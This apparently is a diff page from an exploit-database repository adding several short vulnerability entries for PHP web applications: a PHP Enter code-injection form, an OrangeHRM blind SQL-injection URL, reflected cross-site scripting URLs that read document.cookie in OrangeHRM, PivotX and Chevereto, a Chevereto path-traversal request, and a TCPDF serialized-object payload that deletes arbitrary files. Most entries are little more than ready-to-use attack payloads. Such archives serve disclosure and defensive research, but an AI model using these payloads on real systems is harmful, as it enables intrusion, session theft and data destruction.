PHP Enter is prone to a remote PHP code-injection vulnerability.
|
||||
|
||||
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
||||
|
||||
PHP Enter 4.1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
<form method="post" action="http://www.example.com/admin/banners.php">
|
||||
<center>
|
||||
<font color=#3A586A>Code</font><br />
|
||||
<textarea name="code"></textarea>
|
||||
<br /><br />
|
||||
<input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/>
|
||||
</form>
|
9
platforms/php/webapps/37142.txt
Executable file
9
platforms/php/webapps/37142.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53433/info
|
||||
|
||||
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20 OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,EN CODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202
|
9
platforms/php/webapps/37143.txt
Executable file
9
platforms/php/webapps/37143.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53433/info
|
||||
|
||||
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId=1&newHspStatus=1%3Cscript%3Ealert %28document.cookie%29;%3C/script%3E&empId=1
|
9
platforms/php/webapps/37144.txt
Executable file
9
platforms/php/webapps/37144.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53433/info
|
||||
|
||||
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/templates/hrfunct/emppop.php?reqcode=1&sortOrder1=%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
|
9
platforms/php/webapps/37145.txt
Executable file
9
platforms/php/webapps/37145.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53433/info
|
||||
|
||||
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?uri=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
9
platforms/php/webapps/37146.txt
Executable file
9
platforms/php/webapps/37146.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53434/info
|
||||
|
||||
PivotX is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
PivotX 2.3.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/pivotx/ajaxhelper.php?function=view&file=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
11
platforms/php/webapps/37147.txt
Executable file
11
platforms/php/webapps/37147.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/53448/info
|
||||
|
||||
Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks.
|
||||
|
||||
Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script>
|
11
platforms/php/webapps/37148.txt
Executable file
11
platforms/php/webapps/37148.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/53448/info
|
||||
|
||||
Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks.
|
||||
|
||||
Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php
|
84
platforms/php/webapps/37151.txt
Executable file
84
platforms/php/webapps/37151.txt
Executable file
|
@ -0,0 +1,84 @@
|
|||
TCPDF library Universal POI Payload to Arbitrary File Deletion
|
||||
|
||||
[+] Author: Filippo Roncari
|
||||
[+] Target: TCPDF library
|
||||
[+] Version: <= 5.9 and probably others [tested on v5.9]
|
||||
[+] Vendor: http://www.tcpdf.org
|
||||
[+] Accessibility: Remote
|
||||
[+] Severity: High
|
||||
[+] CVE: n/a
|
||||
[+] Advisory URL: n/a
|
||||
[+] Contacts: f.roncari@securenetwork.it / f@unsec.it
|
||||
|
||||
|
||||
[+] Summary
|
||||
TCPDF library is one of the world's most used open source PHP libraries, included in thousands of CMS and Web applications worldwide. More information at: http://en.wikipedia.org/wiki/TCPDF. A universal Object Injection payload for vulnerable PHP applications, which make use of TCPDF library, is here shared.
|
||||
|
||||
|
||||
[+] Exploit Details
|
||||
The identified payload allows to exploit any POI vulnerable web application that uses unserialize() on not sanitized user input in a point from which the Tcpdf class is loadable. The payload abuses the __destruct() magic method of the Tcpdf class defined in tcpdf.php and allows to arbitrary delete files on the filesystem.
|
||||
|
||||
|
||||
[+] Technical Details
|
||||
Tcpdf.php contains the Tcpdf class definition. The __destruct() method, at least up to version 5.9 (and possibly others), is implemented as follows.
|
||||
|
||||
|
||||
[!] Method __destruct() in tcpdf.php
|
||||
-------------------------
|
||||
public function __destruct() {
|
||||
// restore internal encoding
|
||||
if (isset($this->internal_encoding) AND !empty($this->internal_encoding)) {
|
||||
mb_internal_encoding($this->internal_encoding);
|
||||
}
|
||||
// unset all class variables
|
||||
$this->_destroy(true);
|
||||
}
|
||||
-------------------------
|
||||
|
||||
As you can see, the main action performed by __destruct() is the invocation of the inner _destroy() method, which, along with other things, calls the unlink() function on the internal object buffer.
|
||||
|
||||
|
||||
[!] Method _destroy() in tcpdf.php
|
||||
-------------------------
|
||||
public function _destroy($destroyall=false, $preserve_objcopy=false) {
|
||||
|
||||
if ($destroyall AND isset($this->diskcache) AND $this->diskcache AND (!$preserve_objcopy) AND (!$this->empty_string($this->buffer))) {
|
||||
unlink($this->buffer);
|
||||
}
|
||||
|
||||
[...]
|
||||
|
||||
}
|
||||
-------------------------
|
||||
|
||||
For a better understanding of the payload, you should know that $buffer is defined as a protected property of the Tcpdf object, which means significant differences in serialization compared to normal properties.
|
||||
|
||||
|
||||
[!] $buffer in tcpdf.php
|
||||
-------------------------
|
||||
/**
|
||||
* @var buffer holding in-memory PDF
|
||||
* @access protected
|
||||
*/
|
||||
protected $buffer;
|
||||
-------------------------
|
||||
|
||||
|
||||
[+] Proof of Concept (PoC)
|
||||
In view of the above, the payload consists of a serialized Tcpdf object with two protected properties set: buffer and diskcache. The first will contain the path to the arbitrary file to delete, while diskcache is a boolean property set to true, necessary to enter the _destroy() inner if branch, in order to reach the unlink() call. A particular attention must be addressed to the null-bytes surrounding the asterisks before the property names. This is the way (crazy, I know) in which PHP serializes protected object properties. An incorrect conversion of the null-bytes during payload injection will result in the exploit failure.
|
||||
|
||||
[!] Payload
|
||||
-------------------------
|
||||
O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:[PATH_LENGTH]:"[FILE_PATH_TO_DELETE]";s:12:"%00*%00diskcache";b:1;}
|
||||
-------------------------
|
||||
|
||||
|
||||
[!] Generic PoC Exploit
|
||||
-------------------------
|
||||
http://vulnerablesite.com/vulnerable_page.php?vulnearble_par=O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:26:"/var/www/arbitraryfile.ext";s:12:"%00*%00diskcache";b:1;}
|
||||
-------------------------
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
|
Loading…
Add table
Reference in a new issue